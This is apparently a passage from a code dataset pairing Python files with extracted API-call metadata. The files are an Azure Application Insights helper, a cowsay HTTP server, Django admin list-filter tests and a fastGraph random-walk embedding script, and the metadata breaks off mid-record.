code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
from utilities import utilities
from azure.mgmt.resource import ResourceManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.applicationinsights.models import (
ApplicationInsightsComponent
)
def create_or_update(resource_name, resource_group_name, location, tags, spec):
    """Ensure the resource group exists, then create or update an
    Application Insights component inside it.

    :param resource_name: name of the Application Insights component.
    :param resource_group_name: resource group to create/update it in.
    :param location: Azure region for both the group and the component.
    :param tags: tags to attach to the component.
    :param spec: extra ApplicationInsightsComponent keyword arguments.
    :returns: tuple of ``(resource id, instrumentation key)``.
    """
    credentials, subscription_id = utilities.get_credentials()
    resource_client = ResourceManagementClient(credentials, subscription_id)
    insights_client = ApplicationInsightsManagementClient(credentials, subscription_id)

    # The resource group must exist before the component can be placed in it.
    resource_client.resource_groups.create_or_update(
        resource_group_name,
        {'location': location}
    )

    component = ApplicationInsightsComponent(
        location=location,
        tags=tags,
        **spec
    )
    created = insights_client.components.create_or_update(
        resource_group_name,
        resource_name,
        component
    )
    return created.id, created.instrumentation_key
def delete(resource_group_name, resource_name):
    """Delete the named Application Insights component from its resource group."""
    credentials, subscription_id = utilities.get_credentials()
    insights_client = ApplicationInsightsManagementClient(credentials, subscription_id)
    insights_client.components.delete(resource_group_name, resource_name)
| [
"azure.mgmt.applicationinsights.models.ApplicationInsightsComponent",
"azure.mgmt.applicationinsights.ApplicationInsightsManagementClient",
"utilities.utilities.get_credentials",
"azure.mgmt.resource.ResourceManagementClient"
] | [((373, 400), 'utilities.utilities.get_credentials', 'utilities.get_credentials', ([], {}), '()\n', (398, 400), False, 'from utilities import utilities\n'), ((433, 487), 'azure.mgmt.resource.ResourceManagementClient', 'ResourceManagementClient', (['credentials', 'subscription_id'], {}), '(credentials, subscription_id)\n', (457, 487), False, 'from azure.mgmt.resource import ResourceManagementClient\n'), ((536, 601), 'azure.mgmt.applicationinsights.ApplicationInsightsManagementClient', 'ApplicationInsightsManagementClient', (['credentials', 'subscription_id'], {}), '(credentials, subscription_id)\n', (571, 601), False, 'from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient\n'), ((1211, 1238), 'utilities.utilities.get_credentials', 'utilities.get_credentials', ([], {}), '()\n', (1236, 1238), False, 'from utilities import utilities\n'), ((1265, 1330), 'azure.mgmt.applicationinsights.ApplicationInsightsManagementClient', 'ApplicationInsightsManagementClient', (['credentials', 'subscription_id'], {}), '(credentials, subscription_id)\n', (1300, 1330), False, 'from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient\n'), ((928, 994), 'azure.mgmt.applicationinsights.models.ApplicationInsightsComponent', 'ApplicationInsightsComponent', ([], {'location': 'location', 'tags': 'tags'}), '(location=location, tags=tags, **spec)\n', (956, 994), False, 'from azure.mgmt.applicationinsights.models import ApplicationInsightsComponent\n')] |
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs
import os
from textwrap import dedent
from cowpy import cow
import json
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
    """Request handler for a small cowsay web app.

    GET /     -> static HTML landing page.
    GET /cow  -> cowsay rendering of the ``msg`` query parameter (text/html).
    POST /cow -> cowsay rendering of ``msg`` wrapped in a JSON document.
    A missing ``msg`` parameter yields a 400; any other path a 404, with the
    error text rendered through ``cow.DragonAndCow``.
    """

    def _send_cow_error(self, status, message):
        """Send *status* headers plus a DragonAndCow rendering of *message*."""
        self.send_response(status)
        self.end_headers()
        dragon = cow.DragonAndCow()
        msg = dragon.milk(message)
        self.wfile.write(msg.encode())

    def do_GET(self):
        """ sets a status code, sets headers, sets body, and ends headers
        """
        raw_html = dedent('''
            <html>
            <head>
                <title> cowsay </title>
            </head>
            <body>
                <header>
                    <nav>
                        <ul>
                            <li><a href="/cow">cowsay</a></li>
                        </ul>
                    </nav>
                <header>
                <main>
                    <!-- project description defining how users can further interact with the application -->
                </main>
            </body>
            </html>''')
        parsed_path = urlparse(self.path)
        parsed_qs = parse_qs(parsed_path.query)
        if parsed_path.path == '/':
            self.send_response(200)
            self.send_header('Content-Type', 'text/html')
            self.end_headers()
            self.wfile.write(raw_html.encode())
            return
        elif parsed_path.path == '/cow':
            # Keep the try body minimal: only the dict access can KeyError.
            try:
                parsed_message = parsed_qs['msg'][0]
            except KeyError:
                # "msg" query parameter is required for /cow.
                self._send_cow_error(400, '400 Bad Request')
                return
            bunny = cow.Bunny()
            msg = bunny.milk(parsed_message)
            self.send_response(200)
            self.send_header('Content-Type', 'text/html')
            self.end_headers()
            self.wfile.write(msg.encode())
            return
        else:
            # BUG FIX: the original sent a second 404 status line and headers
            # *after* the response body had already been written, corrupting
            # the HTTP response. Send the status/headers exactly once.
            self._send_cow_error(404, '404 Not Found')

    def do_POST(self):
        """ Posts to the server
        """
        parsed_path = urlparse(self.path)
        parsed_qs = parse_qs(parsed_path.query)
        if parsed_path.path == '/cow':
            try:
                parsed_message = parsed_qs['msg'][0]
            except KeyError:
                self._send_cow_error(400, '400 Bad Request')
                return
            bunny = cow.Bunny()
            msg = bunny.milk(parsed_message)
            json_message = json.dumps({'content': msg})
            self.send_response(200)
            self.send_header('Content-Type', 'application/json')
            self.end_headers()
            self.wfile.write(json_message.encode())
        else:
            self._send_cow_error(404, '404 Not Found')
def create_server():
    """Build and return the HTTPServer instance bound to localhost.

    The listening port is taken from the ``PORT`` environment variable.
    """
    host = '127.0.0.1'
    port = int(os.environ['PORT'])
    return HTTPServer((host, port), SimpleHTTPRequestHandler)
def run_forever():
    """Serve HTTP requests until interrupted with Ctrl-C."""
    httpd = create_server()
    try:
        port = os.environ["PORT"]
        print(f'Server running on {port}')
        httpd.serve_forever()
    except KeyboardInterrupt:
        # Ctrl-C: stop the serve loop and release the listening socket.
        httpd.shutdown()
        httpd.server_close()
# Start the server only when executed as a script, not on import.
if __name__ == '__main__':
    run_forever()
| [
"textwrap.dedent",
"cowpy.cow.Bunny",
"urllib.parse.urlparse",
"cowpy.cow.DragonAndCow",
"json.dumps",
"urllib.parse.parse_qs"
] | [((361, 844), 'textwrap.dedent', 'dedent', (['"""\n <html>\n <head>\n <title> cowsay </title>\n </head>\n <body>\n <header>\n <nav>\n <ul>\n <li><a href="/cow">cowsay</a></li>\n </ul>\n </nav>\n <header>\n <main>\n <!-- project description defining how users can further interact with the application -->\n </main>\n </body>\n </html>"""'], {}), '(\n """\n <html>\n <head>\n <title> cowsay </title>\n </head>\n <body>\n <header>\n <nav>\n <ul>\n <li><a href="/cow">cowsay</a></li>\n </ul>\n </nav>\n <header>\n <main>\n <!-- project description defining how users can further interact with the application -->\n </main>\n </body>\n </html>"""\n )\n', (367, 844), False, 'from textwrap import dedent\n'), ((857, 876), 'urllib.parse.urlparse', 'urlparse', (['self.path'], {}), '(self.path)\n', (865, 876), False, 'from urllib.parse import urlparse, parse_qs\n'), ((897, 924), 'urllib.parse.parse_qs', 'parse_qs', (['parsed_path.query'], {}), '(parsed_path.query)\n', (905, 924), False, 'from urllib.parse import urlparse, parse_qs\n'), ((2168, 2187), 'urllib.parse.urlparse', 'urlparse', (['self.path'], {}), '(self.path)\n', (2176, 2187), False, 'from urllib.parse import urlparse, parse_qs\n'), ((2208, 2235), 'urllib.parse.parse_qs', 'parse_qs', (['parsed_path.query'], {}), '(parsed_path.query)\n', (2216, 2235), False, 'from urllib.parse import urlparse, parse_qs\n'), ((3065, 3083), 'cowpy.cow.DragonAndCow', 'cow.DragonAndCow', ([], {}), '()\n', (3081, 3083), False, 'from cowpy import cow\n'), ((1909, 1927), 'cowpy.cow.DragonAndCow', 'cow.DragonAndCow', ([], {}), '()\n', (1925, 1927), False, 'from cowpy import cow\n'), ((2370, 2381), 'cowpy.cow.Bunny', 'cow.Bunny', ([], {}), '()\n', (2379, 2381), False, 'from cowpy import cow\n'), ((2462, 2490), 'json.dumps', 'json.dumps', (["{'content': msg}"], {}), "({'content': msg})\n", (2472, 2490), False, 'import json\n'), ((1290, 1301), 'cowpy.cow.Bunny', 'cow.Bunny', ([], {}), '()\n', (1299, 1301), False, 'from cowpy import cow\n'), 
((2844, 2862), 'cowpy.cow.DragonAndCow', 'cow.DragonAndCow', ([], {}), '()\n', (2860, 2862), False, 'from cowpy import cow\n'), ((1688, 1706), 'cowpy.cow.DragonAndCow', 'cow.DragonAndCow', ([], {}), '()\n', (1704, 1706), False, 'from cowpy import cow\n')] |
# coding=utf-8
"""List filter test cases."""
import pytest
from django.contrib.auth.models import Permission
from django.contrib.contenttypes.models import ContentType
from django.test import TestCase, override_settings
from django.urls import reverse
from acme.core.models import Customer
from acme.tests import new_user
from model_filters.constants import FILTER_PARAMETER_NAME
from model_filters.models import FieldFilter, ModelFilter
@pytest.mark.e2e
@pytest.mark.filter
class Tests(TestCase):
    """List filter tests."""

    def test_filtering_model_filter(self):
        """List filter on a ModelAdmin should work."""
        owner = new_user(is_staff=True, is_superuser=True)
        self.client.force_login(owner)
        # Two customers: the FieldFilter below matches exactly one of them.
        customer1 = Customer.objects.create(
            name="<NAME>", membership=Customer.MEMBERSHIP_PLATINUM
        )
        customer2 = Customer.objects.create(
            name="<NAME>", membership=Customer.MEMBERSHIP_GOLD
        )
        content_type = ContentType.objects.get_for_model(Customer)
        model_filter = ModelFilter.objects.create(
            name="Test Filter", content_type=content_type, owner=owner
        )
        field_filter = FieldFilter.objects.create(
            model_filter=model_filter,
            field="name",
            operator="exact",
            value="<NAME>",
        )
        # Naked list.
        list_url = reverse(
            f"admin:{content_type.app_label}_{content_type.model}_changelist"
        )
        response = self.client.get(list_url)
        self.assertEqual(200, response.status_code)
        self.assertEqual(list_url, f"{response.request['PATH_INFO']}")
        # With no filter applied both customers show, newest first.
        self.assertEqual(response.context["cl"].result_count, 2)
        self.assertEqual(response.context["cl"].result_list[0], customer2)
        self.assertEqual(response.context["cl"].result_list[1], customer1)
        # Model filter applied.
        filter_url = f"{list_url}?{FILTER_PARAMETER_NAME}={model_filter.id}"
        # These will match the customer name.
        # "" keeps the initial "exact" operator from the fixture above.
        operators = ["", "iexact", "regex", "iregex", "contains", "icontains"]
        for operator in operators:
            if operator:
                field_filter.operator = operator
                field_filter.save()
            response = self.client.get(filter_url)
            self.assertEqual(200, response.status_code)
            self.assertEqual(
                filter_url,
                f"{response.request['PATH_INFO']}?{response.request['QUERY_STRING']}",
            )
            self.assertEqual(response.context["cl"].result_count, 1)
        # These will not match the customer name.
        operators = ["isnull", "isempty"]
        for operator in operators:
            field_filter.operator = operator
            field_filter.save()
            response = self.client.get(filter_url)
            self.assertEqual(200, response.status_code)
            self.assertEqual(
                filter_url,
                f"{response.request['PATH_INFO']}?{response.request['QUERY_STRING']}",
            )
            self.assertEqual(response.context["cl"].result_count, 0)
        # Missing filter shows naked list.
        # (Filter id 1000 does not exist, so the filter is silently ignored.)
        filter_url = f"{list_url}?{FILTER_PARAMETER_NAME}=1000"
        response = self.client.get(filter_url)
        self.assertEqual(200, response.status_code)
        self.assertEqual(response.context["cl"].result_count, 2)
        self.assertEqual(response.context["cl"].result_list[0], customer2)
        self.assertEqual(response.context["cl"].result_list[1], customer1)

    def test_filter_menu_display(self):
        """Filter menu should show list of model filters."""
        # Two staff owners, each with their own model filter; visibility of
        # the *other* owner's filter depends on the MODEL_FILTERS_* settings.
        owner1 = new_user(is_staff=True)
        owner2 = new_user(is_staff=True)
        content_type = ContentType.objects.get_for_model(Customer)
        permission = Permission.objects.get(
            content_type=content_type,
            codename="view_customer",
        )
        owner1.user_permissions.add(permission)
        owner2.user_permissions.add(permission)
        ModelFilter.objects.create(
            name="Test Filter 1", content_type=content_type, owner=owner1
        )
        model_filter_2 = ModelFilter.objects.create(
            name="Test Filter 2", content_type=content_type, owner=owner2
        )
        self.client.force_login(owner1)
        # Only the owners model filters should be in the response.
        list_url = reverse(
            f"admin:{content_type.app_label}_{content_type.model}_changelist"
        )
        response = self.client.get(list_url)
        self.assertContains(response, "Test Filter 1")
        self.assertNotContains(response, "Test Filter 2")
        # Override setting so all staff can see permissible filters.
        with override_settings(MODEL_FILTERS_VIEW_OWNER_ONLY=False):
            # Add class permissions.
            permission = Permission.objects.get(
                content_type=ContentType.objects.get_for_model(ModelFilter),
                codename="view_modelfilter",
            )
            owner1.user_permissions.add(permission)
            # The other user's model filters should be in the response with a *.
            response = self.client.get(
                f"{list_url}?{FILTER_PARAMETER_NAME}={model_filter_2.id}"
            )
            self.assertContains(response, "Test Filter 1")
            self.assertContains(response, "Test Filter 2 *")
            self.assertNotContains(response, "Edit Filter")
            self.assertEqual(response.context["choices"][0]["display"], "All")
            self.assertEqual(response.context["choices"][1]["display"], "Test Filter 1")
            self.assertEqual(
                response.context["choices"][2]["display"], "Test Filter 2 *"
            )
            # Let other staff change model filters.
            with override_settings(MODEL_FILTERS_CHANGE_OWNER_ONLY=False):
                # Still blocked since no "change" permissions.
                response = self.client.get(
                    f"{list_url}?{FILTER_PARAMETER_NAME}={model_filter_2.id}"
                )
                self.assertNotContains(response, "Edit Filter")
                # Add change permissions.
                permission = Permission.objects.get(
                    content_type=ContentType.objects.get_for_model(ModelFilter),
                    codename="change_modelfilter",
                )
                owner1.user_permissions.add(permission)
                # Can now see the edit filter link.
                response = self.client.get(
                    f"{list_url}?{FILTER_PARAMETER_NAME}={model_filter_2.id}"
                )
                self.assertContains(response, "Edit Filter")
            # Override the default ordering.
            with override_settings(MODEL_FILTERS_ORDER_BY="-created"):
                response = self.client.get(list_url)
                self.assertContains(response, "Test Filter 1")
                self.assertContains(response, "Test Filter 2 *")
                self.assertEqual(response.context["choices"][0]["display"], "All")
                self.assertEqual(
                    response.context["choices"][1]["display"], "Test Filter 2 *"
                )
                self.assertEqual(
                    response.context["choices"][2]["display"], "Test Filter 1"
                )
| [
"model_filters.models.FieldFilter.objects.create",
"django.contrib.auth.models.Permission.objects.get",
"django.contrib.contenttypes.models.ContentType.objects.get_for_model",
"acme.core.models.Customer.objects.create",
"django.test.override_settings",
"django.urls.reverse",
"model_filters.models.ModelF... | [((647, 689), 'acme.tests.new_user', 'new_user', ([], {'is_staff': '(True)', 'is_superuser': '(True)'}), '(is_staff=True, is_superuser=True)\n', (655, 689), False, 'from acme.tests import new_user\n'), ((749, 828), 'acme.core.models.Customer.objects.create', 'Customer.objects.create', ([], {'name': '"""<NAME>"""', 'membership': 'Customer.MEMBERSHIP_PLATINUM'}), "(name='<NAME>', membership=Customer.MEMBERSHIP_PLATINUM)\n", (772, 828), False, 'from acme.core.models import Customer\n'), ((871, 946), 'acme.core.models.Customer.objects.create', 'Customer.objects.create', ([], {'name': '"""<NAME>"""', 'membership': 'Customer.MEMBERSHIP_GOLD'}), "(name='<NAME>', membership=Customer.MEMBERSHIP_GOLD)\n", (894, 946), False, 'from acme.core.models import Customer\n'), ((992, 1035), 'django.contrib.contenttypes.models.ContentType.objects.get_for_model', 'ContentType.objects.get_for_model', (['Customer'], {}), '(Customer)\n', (1025, 1035), False, 'from django.contrib.contenttypes.models import ContentType\n'), ((1059, 1149), 'model_filters.models.ModelFilter.objects.create', 'ModelFilter.objects.create', ([], {'name': '"""Test Filter"""', 'content_type': 'content_type', 'owner': 'owner'}), "(name='Test Filter', content_type=content_type,\n owner=owner)\n", (1085, 1149), False, 'from model_filters.models import FieldFilter, ModelFilter\n'), ((1191, 1296), 'model_filters.models.FieldFilter.objects.create', 'FieldFilter.objects.create', ([], {'model_filter': 'model_filter', 'field': '"""name"""', 'operator': '"""exact"""', 'value': '"""<NAME>"""'}), "(model_filter=model_filter, field='name',\n operator='exact', value='<NAME>')\n", (1217, 1296), False, 'from model_filters.models import FieldFilter, ModelFilter\n'), ((1394, 1468), 'django.urls.reverse', 'reverse', (['f"""admin:{content_type.app_label}_{content_type.model}_changelist"""'], {}), "(f'admin:{content_type.app_label}_{content_type.model}_changelist')\n", (1401, 1468), False, 'from 
django.urls import reverse\n'), ((3671, 3694), 'acme.tests.new_user', 'new_user', ([], {'is_staff': '(True)'}), '(is_staff=True)\n', (3679, 3694), False, 'from acme.tests import new_user\n'), ((3712, 3735), 'acme.tests.new_user', 'new_user', ([], {'is_staff': '(True)'}), '(is_staff=True)\n', (3720, 3735), False, 'from acme.tests import new_user\n'), ((3759, 3802), 'django.contrib.contenttypes.models.ContentType.objects.get_for_model', 'ContentType.objects.get_for_model', (['Customer'], {}), '(Customer)\n', (3792, 3802), False, 'from django.contrib.contenttypes.models import ContentType\n'), ((3824, 3899), 'django.contrib.auth.models.Permission.objects.get', 'Permission.objects.get', ([], {'content_type': 'content_type', 'codename': '"""view_customer"""'}), "(content_type=content_type, codename='view_customer')\n", (3846, 3899), False, 'from django.contrib.auth.models import Permission\n'), ((4039, 4132), 'model_filters.models.ModelFilter.objects.create', 'ModelFilter.objects.create', ([], {'name': '"""Test Filter 1"""', 'content_type': 'content_type', 'owner': 'owner1'}), "(name='Test Filter 1', content_type=content_type,\n owner=owner1)\n", (4065, 4132), False, 'from model_filters.models import FieldFilter, ModelFilter\n'), ((4176, 4269), 'model_filters.models.ModelFilter.objects.create', 'ModelFilter.objects.create', ([], {'name': '"""Test Filter 2"""', 'content_type': 'content_type', 'owner': 'owner2'}), "(name='Test Filter 2', content_type=content_type,\n owner=owner2)\n", (4202, 4269), False, 'from model_filters.models import FieldFilter, ModelFilter\n'), ((4415, 4489), 'django.urls.reverse', 'reverse', (['f"""admin:{content_type.app_label}_{content_type.model}_changelist"""'], {}), "(f'admin:{content_type.app_label}_{content_type.model}_changelist')\n", (4422, 4489), False, 'from django.urls import reverse\n'), ((4753, 4807), 'django.test.override_settings', 'override_settings', ([], {'MODEL_FILTERS_VIEW_OWNER_ONLY': '(False)'}), 
'(MODEL_FILTERS_VIEW_OWNER_ONLY=False)\n', (4770, 4807), False, 'from django.test import TestCase, override_settings\n'), ((5832, 5888), 'django.test.override_settings', 'override_settings', ([], {'MODEL_FILTERS_CHANGE_OWNER_ONLY': '(False)'}), '(MODEL_FILTERS_CHANGE_OWNER_ONLY=False)\n', (5849, 5888), False, 'from django.test import TestCase, override_settings\n'), ((6776, 6828), 'django.test.override_settings', 'override_settings', ([], {'MODEL_FILTERS_ORDER_BY': '"""-created"""'}), "(MODEL_FILTERS_ORDER_BY='-created')\n", (6793, 6828), False, 'from django.test import TestCase, override_settings\n'), ((4924, 4970), 'django.contrib.contenttypes.models.ContentType.objects.get_for_model', 'ContentType.objects.get_for_model', (['ModelFilter'], {}), '(ModelFilter)\n', (4957, 4970), False, 'from django.contrib.contenttypes.models import ContentType\n'), ((6286, 6332), 'django.contrib.contenttypes.models.ContentType.objects.get_for_model', 'ContentType.objects.get_for_model', (['ModelFilter'], {}), '(ModelFilter)\n', (6319, 6332), False, 'from django.contrib.contenttypes.models import ContentType\n')] |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import random
import psutil
import logging
import pandas as pd
import numpy as np
from io import open
from collections import Counter
from multiprocessing import cpu_count
from concurrent.futures import ProcessPoolExecutor
from scipy.sparse import csr_matrix, save_npz, load_npz, lil_matrix
from argparse import ArgumentParser, FileType, ArgumentDefaultsHelpFormatter
from gensim.models import Word2Vec
from gensim.models.word2vec import LineSentence
from six import text_type as unicode
from six import iteritems
from six.moves import range
from fastGraph.graph import Graph
from fastGraph import ngram
import pdb
# Pin this process to every available CPU so worker processes can spread out.
# psutil's cpu_affinity() is not implemented on all platforms (e.g. macOS),
# hence the AttributeError guard.
p = psutil.Process(os.getpid())
try:
    p.cpu_affinity(list(range(cpu_count())))
except AttributeError:
    pass
# Module-wide logging configuration; main() later re-applies the level from
# the --log command-line option.
LOGFORMAT = "%(asctime).19s %(levelname)s %(filename)s Line %(lineno)s: %(message)s"
logging.basicConfig(format=LOGFORMAT)
logger = logging.getLogger("fastGraph")
logger.setLevel(logging.INFO)
# Element dtype used for the adjacency buffers built in load_matrix().
DTYPE = np.float64
def debug(type_, value, tb):
    """Exception hook: drop into pdb post-mortem when attached to a TTY.

    In an interactive session or when stderr is not a terminal, fall back
    to the default traceback printer instead of blocking on a debugger.
    """
    use_default_hook = hasattr(sys, 'ps1') or not sys.stderr.isatty()
    if use_default_hook:
        sys.__excepthook__(type_, value, tb)
        return
    import traceback
    import pdb
    traceback.print_exception(type_, value, tb)
    print(u"\n")
    pdb.pm()
def load_matrix(args):
    """Load the file named by ``args.input`` and return it as a CSR matrix.

    Three formats are recognised by file name:
    * ``wiki-Vote.csv``         -- edge list (FromNodeId, ToNodeId), each edge adds 1
    * ``weighted_directed.csv`` -- edge list (SOURCE, TARGET, RATING weights)
    * ``.npz`` / ``.npy``       -- an array saved with numpy

    :raises NotImplementedError: for any other input format.
    """
    logger.info("Reading from " + str(args.input))
    if "wiki-Vote.csv" in args.input:
        df = pd.read_csv(args.input, sep=',', comment='#')
        max_node = max(max(df['FromNodeId'].unique()), max(df['ToNodeId'].unique()))
        total_len = max_node + 1
        # Build the lil_matrix sparsely. The original wrapped a fully dense
        # np.zeros((n, n)) array, allocating O(n^2) memory for a sparse graph.
        matrix = lil_matrix((total_len, total_len), dtype=DTYPE)
        for row in df.itertuples():
            matrix[row.FromNodeId, row.ToNodeId] += 1  # Each edge is binary
        return csr_matrix(matrix)
    elif "weighted_directed.csv" in args.input:
        df = pd.read_csv(args.input, sep=',', comment='#')
        max_node = max(max(df['SOURCE'].unique()), max(df['TARGET'].unique()))
        total_len = max_node + 1
        matrix = lil_matrix((total_len, total_len), dtype=DTYPE)
        for row in df.itertuples():
            matrix[row.SOURCE, row.TARGET] += row.RATING  # Each edge has different weights
        return csr_matrix(matrix)
    elif ".npz" in args.input or ".npy" in args.input:
        logger.info("Load matrix directly")
        # NOTE(review): np.load() on a .npz returns an NpzFile archive, not an
        # array, which csr_matrix() cannot consume -- only .npy appears to
        # work as written; confirm intended usage.
        matrix = np.load(args.input)
        return csr_matrix(matrix)
    else:
        # Implement parsing here to transform into matrix form.
        raise NotImplementedError("Implement customized parsing here.")
def fastGraph_flow(args):
    """End-to-end pipeline: matrix -> graph -> walk corpus -> (n-grams) -> Word2Vec.

    The trained embedding model is saved to ``args.output``; the generated
    walks are persisted next to the input as ``<input stem>.walks``.

    :raises ValueError: if ``args.walk_type`` is not a known strategy.
    """
    # Read and process different input
    matrix = load_matrix(args)
    logger.info("Matrix loaded.")
    graph = Graph()
    graph.build_graph_from_matrix(matrix, is_directed=True, remove_self_loops=False,
                                  normalized_edge=True, outward_prob_check=True)
    # Generate walks with the strategy chosen on the command line.
    if args.walk_type == "likely":
        walks = graph.build_likely_walk_corpus(args.number_paths, args.path_length,
                                              rand=random.Random(0),
                                              shuffle=True, deduplicate=False)
    elif args.walk_type == "node2vec":
        graph.preprocess_node2vec_walk(args.p, args.q)
        walks = graph.build_node2vec_walk_corpus(args.number_paths, args.path_length,
                                                rand=random.Random(0),
                                                shuffle=True, deduplicate=False)
    elif args.walk_type == "deep":
        walks = graph.build_deepwalk_corpus(args.number_paths, args.path_length,
                                           rand=random.Random(0),
                                           shuffle=True, deduplicate=False)
    else:
        raise ValueError("--walk-type must be either 'likely', 'node2vec' or 'deep'.")
    # Save walks to storage, enabling gensim's iterator ability.
    walks_file = ''.join(str(args.input).split('.')[:-1]) + '.walks'
    with open(walks_file, 'w') as fout:
        for walk in walks:
            fout.write(' '.join(walk) + '\n')
    logger.info("Walks saved to " + walks_file)
    # BUG FIX: stream the walks that were just written. The original passed
    # args.input (the raw matrix file) to LineSentence, so Word2Vec trained
    # on the matrix text instead of the generated walk corpus.
    walks = LineSentence(walks_file)
    # Phrases
    if args.ngram > 1:
        logger.info("Building n-gram with n=" + str(args.ngram) + "...")
        walks, ngram_phrasers = ngram.build_ngram(walks, args.ngram)
    # Word2Vec
    logger.info("Training ...")
    w2v = Word2Vec(walks, size=args.embed_size, window=args.window_size, min_count=0,
                   sg=1, hs=0, negative=10, workers=args.workers)
    # Save model
    w2v.save(args.output)
def main():
    """Parse command-line options, configure logging, and run the pipeline."""
    parser = ArgumentParser("fastGraph", formatter_class=ArgumentDefaultsHelpFormatter, conflict_handler='resolve')
    parser.add_argument("-l", "--log", dest="log", default="INFO",
                        help="log verbosity level")
    parser.add_argument('--input', nargs='?', required=True,
                        help='Input matrix')
    parser.add_argument('--max-memory-data-size', default=1000000000, type=int,
                        help='Size to start dumping walks to disk, instead of keeping them in memory.')
    parser.add_argument('--number-paths', default=5, type=int,
                        help='Number of random walks to start at each node')
    parser.add_argument('--output', required=True,
                        help='Output representation file')
    parser.add_argument('--embed-size', default=64, type=int,
                        help='Dimension of the latent vector as embedding.')
    parser.add_argument('--seed', default=0, type=int,
                        help='Seed for random walk generator.')
    parser.add_argument('--directed', default=True, type=bool,
                        help='Treat the graph as directed.')
    parser.add_argument('--path-length', default=40, type=int,
                        help='Length of the random walk started at each node')
    parser.add_argument('--window-size', default=5, type=int,
                        help='Window size of skipgram model.')
    parser.add_argument('--walk-type', default="likely", type=str,
                        help='Which walk method to use: likely, random, node2vec.')
    parser.add_argument('--p', default=5, type=int,
                        help="p value, refer to original paper: https://cs.stanford.edu/~jure/pubs/node2vec-kdd16.pdf ")
    parser.add_argument('--q', default=3, type=int,
                        help="q value, refer to original paper: https://cs.stanford.edu/~jure/pubs/node2vec-kdd16.pdf ")
    parser.add_argument('--workers', default=cpu_count(), type=int,
                        help='Number of parallel processes.')
    parser.add_argument('--ngram', default=1, type=int,
                        help='N of n-grams, e.g.: set 2 for bigrams, 3 for trigrams, etc.')
    args = parser.parse_args()
    numeric_level = getattr(logging, args.log.upper(), None)
    # BUG FIX: getattr() returns None for an unknown level name, and the
    # original then passed None to setLevel(). Fail fast with a clear error
    # instead (standard pattern from the logging HOWTO).
    if not isinstance(numeric_level, int):
        raise ValueError('Invalid log level: %s' % args.log)
    logging.basicConfig(format=LOGFORMAT)  # no-op if already configured at import
    logger.setLevel(numeric_level)
    fastGraph_flow(args)
# BUG FIX: the guard compared against "__main" (missing the trailing
# underscores), so the script never ran when executed directly.
if __name__ == "__main__":
    sys.exit(main())
"logging.getLogger",
"pdb.pm",
"pandas.read_csv",
"io.open",
"sys.stderr.isatty",
"multiprocessing.cpu_count",
"sys.__excepthook__",
"argparse.ArgumentParser",
"fastGraph.ngram.build_ngram",
"random.Random",
"fastGraph.graph.Graph",
"traceback.print_exception",
"gensim.models.Word2Vec",
"g... | [((882, 919), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': 'LOGFORMAT'}), '(format=LOGFORMAT)\n', (901, 919), False, 'import logging\n'), ((930, 960), 'logging.getLogger', 'logging.getLogger', (['"""fastGraph"""'], {}), "('fastGraph')\n", (947, 960), False, 'import logging\n'), ((706, 717), 'os.getpid', 'os.getpid', ([], {}), '()\n', (715, 717), False, 'import os\n'), ((2590, 2597), 'fastGraph.graph.Graph', 'Graph', ([], {}), '()\n', (2595, 2597), False, 'from fastGraph.graph import Graph\n'), ((3895, 3919), 'gensim.models.word2vec.LineSentence', 'LineSentence', (['args.input'], {}), '(args.input)\n', (3907, 3919), False, 'from gensim.models.word2vec import LineSentence\n'), ((4127, 4253), 'gensim.models.Word2Vec', 'Word2Vec', (['walks'], {'size': 'args.embed_size', 'window': 'args.window_size', 'min_count': '(0)', 'sg': '(1)', 'hs': '(0)', 'negative': '(10)', 'workers': 'args.workers'}), '(walks, size=args.embed_size, window=args.window_size, min_count=0,\n sg=1, hs=0, negative=10, workers=args.workers)\n', (4135, 4253), False, 'from gensim.models import Word2Vec\n'), ((4318, 4424), 'argparse.ArgumentParser', 'ArgumentParser', (['"""fastGraph"""'], {'formatter_class': 'ArgumentDefaultsHelpFormatter', 'conflict_handler': '"""resolve"""'}), "('fastGraph', formatter_class=ArgumentDefaultsHelpFormatter,\n conflict_handler='resolve')\n", (4332, 4424), False, 'from argparse import ArgumentParser, FileType, ArgumentDefaultsHelpFormatter\n'), ((6293, 6330), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': 'LOGFORMAT'}), '(format=LOGFORMAT)\n', (6312, 6330), False, 'import logging\n'), ((1095, 1131), 'sys.__excepthook__', 'sys.__excepthook__', (['type_', 'value', 'tb'], {}), '(type_, value, tb)\n', (1113, 1131), False, 'import sys\n'), ((1173, 1216), 'traceback.print_exception', 'traceback.print_exception', (['type_', 'value', 'tb'], {}), '(type_, value, tb)\n', (1198, 1216), False, 'import traceback\n'), ((1234, 1242), 'pdb.pm', 
'pdb.pm', ([], {}), '()\n', (1240, 1242), False, 'import pdb\n'), ((1355, 1400), 'pandas.read_csv', 'pd.read_csv', (['args.input'], {'sep': '""","""', 'comment': '"""#"""'}), "(args.input, sep=',', comment='#')\n", (1366, 1400), True, 'import pandas as pd\n'), ((1720, 1738), 'scipy.sparse.csr_matrix', 'csr_matrix', (['matrix'], {}), '(matrix)\n', (1730, 1738), False, 'from scipy.sparse import csr_matrix, save_npz, load_npz, lil_matrix\n'), ((3756, 3777), 'io.open', 'open', (['walks_file', '"""w"""'], {}), "(walks_file, 'w')\n", (3760, 3777), False, 'from io import open\n'), ((4041, 4077), 'fastGraph.ngram.build_ngram', 'ngram.build_ngram', (['walks', 'args.ngram'], {}), '(walks, args.ngram)\n', (4058, 4077), False, 'from fastGraph import ngram\n'), ((1072, 1091), 'sys.stderr.isatty', 'sys.stderr.isatty', ([], {}), '()\n', (1089, 1091), False, 'import sys\n'), ((1529, 1574), 'numpy.zeros', 'np.zeros', (['(total_len, total_len)'], {'dtype': 'DTYPE'}), '((total_len, total_len), dtype=DTYPE)\n', (1537, 1574), True, 'import numpy as np\n'), ((1791, 1836), 'pandas.read_csv', 'pd.read_csv', (['args.input'], {'sep': '""","""', 'comment': '"""#"""'}), "(args.input, sep=',', comment='#')\n", (1802, 1836), True, 'import pandas as pd\n'), ((2159, 2177), 